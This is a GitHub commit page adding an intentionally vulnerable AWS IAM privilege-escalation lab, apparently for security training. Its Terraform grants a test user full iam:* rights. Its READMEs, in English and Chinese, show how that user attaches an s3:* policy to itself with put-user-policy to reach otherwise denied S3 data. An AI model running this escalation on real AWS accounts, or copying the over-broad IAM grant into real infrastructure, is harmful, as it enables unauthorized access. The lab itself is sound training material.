-
Notifications
You must be signed in to change notification settings - Fork 78
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #30 from teamssix/main
feat: add aws iam privilege escalation scenario
- Loading branch information
Showing
11 changed files
with
308 additions
and
18 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
116 changes: 116 additions & 0 deletions
116
aws/identity_and_access_management/privilege_escalation/README.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,116 @@ | ||
# AWS IAM Privilege Escalation Vulnerable Environment | ||
|
||
English | [中文](./README_CN.md) | ||
|
||
## Description | ||
|
||
This is a scenario used to build the AWS IAM privilege escalation vulnerability environment. | ||
|
||
After building the environment with Terraform, The IAM privilege elevation vulnerability can be used to access services that you would not otherwise have permission to access. | ||
|
||
## Deployment Environment | ||
|
||
Execute the following command in the container | ||
|
||
```shell | ||
cd /TerraformGoat/aws/identity_and_access_management/privilege_escalation | ||
``` | ||
|
||
Configure AWS Access Credentials | ||
|
||
```shell | ||
aws configure | ||
``` | ||
|
||
> You can see the access key in the AWS [Console --> Security Credentials] | ||
Deploy Vulnerable Environment | ||
|
||
```shell | ||
terraform init | ||
terraform apply | ||
``` | ||
|
||
> When the terminal prompts `Enter a value:`, enter `yes` | ||
After building the scenario, use the following command to view the access_key_id and secret_access_key of the low privilege account. | ||
|
||
```shell | ||
apt-get install jq -y | ||
terraform state pull | jq '.resources[] | select(.type == "aws_iam_access_key") | .instances[0].attributes' | ||
``` | ||
|
||
![img](../../../images/1652690733.png) | ||
|
||
## Vulnerability Utilization | ||
|
||
First configure the access_key_id and secret_access_key of the low privilege account. | ||
|
||
```shell | ||
aws configure | ||
``` | ||
|
||
After the configuration, here is an example of S3 service, try to run the following command, you can see the return message shows that access is denied. | ||
|
||
```shell | ||
aws s3 ls | ||
``` | ||
|
||
![img](../../../images/1652690932.png) | ||
|
||
Get the privileges held by the current user. | ||
|
||
```shell | ||
aws iam get-user | ||
aws iam list-user-policies --user-name huoxian_terraform_test | ||
aws iam get-user-policy --user-name huoxian_terraform_test --policy-name IAMFullAccess | ||
``` | ||
|
||
![img](../../../images/1652692179.png) | ||
|
||
You can see that the current user has all the privileges of IAM, which means that we can give S3 privileges to the current user, thus enabling the current user to access S3 service resources. | ||
|
||
Edit policy file | ||
|
||
```shell | ||
vim AmazonS3FullAccess.json | ||
``` | ||
|
||
The contents of the policy file are as follows: | ||
|
||
```json | ||
{ | ||
"Version": "2012-10-17", | ||
"Statement": [ | ||
{ | ||
"Effect": "Allow", | ||
"Action": [ | ||
"s3:*", | ||
"s3-object-lambda:*" | ||
], | ||
"Resource": "*" | ||
} | ||
] | ||
} | ||
``` | ||
|
||
PUT policy file | ||
|
||
```shell | ||
aws iam put-user-policy --user-name huoxian_terraform_test --policy-name AmazonS3FullAccess --policy-document file://AmazonS3FullAccess.json | ||
``` | ||
|
||
Try again to get the S3 service resource, you can see that it has been obtained, which means that the policy file is in effect, so that the IAM privilege elevation is achieved. | ||
|
||
```shell | ||
aws s3 ls | ||
``` | ||
|
||
![img](../../../images/1652692416.png) | ||
|
||
## Destroy the environment | ||
|
||
```shell | ||
aws iam delete-user-policy --user-name huoxian_terraform_test --policy-name AmazonS3FullAccess | ||
terraform destroy | ||
``` |
116 changes: 116 additions & 0 deletions
116
aws/identity_and_access_management/privilege_escalation/README_CN.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,116 @@ | ||
# AWS IAM 提权漏洞环境 | ||
|
||
[English](./README.md) | 中文 | ||
|
||
## 描述信息 | ||
|
||
这是一个用于构建 AWS IAM 提权漏洞环境的靶场。 | ||
|
||
使用 Terraform 构建环境后,用户可以通过 IAM 提权漏洞访问到原本没有权限访问的服务。 | ||
|
||
## 环境搭建 | ||
|
||
在容器中执行以下命令 | ||
|
||
```shell | ||
cd /TerraformGoat/aws/identity_and_access_management/privilege_escalation | ||
``` | ||
|
||
配置 AWS 访问凭证 | ||
|
||
```shell | ||
aws configure | ||
``` | ||
|
||
> 在 AWS 「控制台——》安全凭证」处可以设置并查看你的 `aws_access_key_id` 和 `aws_secret_access_key` | ||
部署靶场 | ||
|
||
```shell | ||
terraform init | ||
terraform apply | ||
``` | ||
|
||
> 在终端提示 `Enter a value:` 时,输入 `yes` 即可 | ||
环境搭建完后,通过以下命令查看低权限账号的 access_key_id 和 secret_access_key | ||
|
||
```shell | ||
apt-get install jq -y | ||
terraform state pull | jq '.resources[] | select(.type == "aws_iam_access_key") | .instances[0].attributes' | ||
``` | ||
|
||
![img](../../../images/1652690733.png) | ||
|
||
## 漏洞利用 | ||
|
||
首先配置上低权限账号的 access_key_id 和 secret_access_key | ||
|
||
```shell | ||
aws configure | ||
``` | ||
|
||
配置完后,这里以 S3 服务为例,尝试运行以下命令,发现访问被拒绝 | ||
|
||
```shell | ||
aws s3 ls | ||
``` | ||
|
||
![img](../../../images/1652690932.png) | ||
|
||
查看当前用户的权限 | ||
|
||
```shell | ||
aws iam get-user | ||
aws iam list-user-policies --user-name huoxian_terraform_test | ||
aws iam get-user-policy --user-name huoxian_terraform_test --policy-name IAMFullAccess | ||
``` | ||
|
||
![img](../../../images/1652692179.png) | ||
|
||
发现当前用户有 IAM 的所有权限,这也就意味着我们可以给当前用户赋予 S3 的权限,从而使当前用户拥有 S3 服务的权限。 | ||
|
||
编辑策略文件 | ||
|
||
```shell | ||
vim AmazonS3FullAccess.json | ||
``` | ||
|
||
文件内容如下: | ||
|
||
```json | ||
{ | ||
"Version": "2012-10-17", | ||
"Statement": [ | ||
{ | ||
"Effect": "Allow", | ||
"Action": [ | ||
"s3:*", | ||
"s3-object-lambda:*" | ||
], | ||
"Resource": "*" | ||
} | ||
] | ||
} | ||
``` | ||
|
||
上传策略文件 | ||
|
||
```shell | ||
aws iam put-user-policy --user-name huoxian_terraform_test --policy-name AmazonS3FullAccess --policy-document file://AmazonS3FullAccess.json | ||
``` | ||
|
||
再次尝试获取 S3 服务内容,发现已经可以获取了,说明策略文件生效了,这样就实现了 IAM 提权。 | ||
|
||
```shell | ||
aws s3 ls | ||
``` | ||
|
||
![img](../../../images/1652692416.png) | ||
|
||
## 销毁环境 | ||
|
||
```shell | ||
aws iam delete-user-policy --user-name huoxian_terraform_test --policy-name AmazonS3FullAccess | ||
terraform destroy | ||
``` |
46 changes: 46 additions & 0 deletions
46
aws/identity_and_access_management/privilege_escalation/main.tf
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,46 @@ | ||
provider "aws" { | ||
region = "us-east-1" | ||
} | ||
|
||
resource "aws_iam_user" "huoxian_terraform_user" { | ||
name = "huoxian_terraform_test" | ||
} | ||
|
||
resource "aws_iam_access_key" "huoxian_terraform_access_key" { | ||
user = aws_iam_user.huoxian_terraform_user.name | ||
depends_on = [aws_iam_user.huoxian_terraform_user] | ||
} | ||
|
||
resource "aws_iam_user_policy" "huoxian_terraform_policy" { | ||
name = "IAMFullAccess" | ||
user = aws_iam_user.huoxian_terraform_user.name | ||
depends_on = [aws_iam_user.huoxian_terraform_user] | ||
policy = <<EOF | ||
{ | ||
"Version": "2012-10-17", | ||
"Statement": [ | ||
{ | ||
"Action": [ | ||
"iam:*", | ||
"organizations:DescribeAccount", | ||
"organizations:DescribeOrganization", | ||
"organizations:DescribeOrganizationalUnit", | ||
"organizations:DescribePolicy", | ||
"organizations:ListChildren", | ||
"organizations:ListParents", | ||
"organizations:ListPoliciesForTarget", | ||
"organizations:ListRoots", | ||
"organizations:ListPolicies", | ||
"organizations:ListTargetsForPolicy" | ||
], | ||
"Effect": "Allow", | ||
"Resource": "*" | ||
} | ||
] | ||
} | ||
EOF | ||
} | ||
|
||
data "template_file" "secret" { | ||
template = aws_iam_access_key.huoxian_terraform_access_key.encrypted_secret | ||
} |
8 changes: 8 additions & 0 deletions
8
aws/identity_and_access_management/privilege_escalation/versions.tf
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,8 @@ | ||
terraform { | ||
required_providers { | ||
aws = { | ||
source = "hashicorp/aws" | ||
version = "4.10.0" | ||
} | ||
} | ||
} |
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.